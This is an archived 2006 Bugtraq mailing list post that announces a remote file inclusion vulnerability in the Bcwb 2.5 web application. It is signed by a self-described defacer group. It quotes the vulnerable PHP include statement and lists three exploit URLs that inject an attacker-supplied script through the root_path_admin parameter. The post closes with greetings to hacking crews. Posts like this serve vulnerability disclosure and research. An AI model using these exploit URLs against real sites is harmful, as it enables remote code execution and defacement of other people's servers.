Bugtraq mailing list archives
Multiple Remote File Include
From: firewall1954 () hotmail com
Date: 30 Oct 2006 17:55:25 -0000
####################### Firewall ######################### Bcwb 2.5 - Multiple File Include by Firewall Latin American Defacers BuG FounD by Firewall # Application Affect: Bcwb 2.5 # Sorce Code: http://prdownloads.sourceforge.net/bcwb/bcwb_v25.zip?download # Code: if(! include($root_path_admin.'lang/'.$default_language.'.inc.php') ) die("Can't include ".$root_path.'lang/'.$default_language.'.inc.php'); # ExPloit : http://www.site.com/Bcwb_PATH/include/startup.inc.php?root_path_admin=[Evil Script] http://www.site.com/Bcwb_PATH/dcontent/default.css.php?root_path_admin=[Evil Script] http://www.site.com/Bcwb_PATH/system/default.css.php?root_path_admin=[Evil Script] # GrEatZ :LAD,C-group,Her0,slackwaren,slappter,Cvir.System,Hanowars,ANtrAX ,napster,saok,Zlevyn,FaLENcE,Azrael,CyberAlexis,krhonoz,RaDaM4nTySS. ####################### Firewall #########################
Current thread:
- Multiple Remote File Include firewall1954 (Oct 30)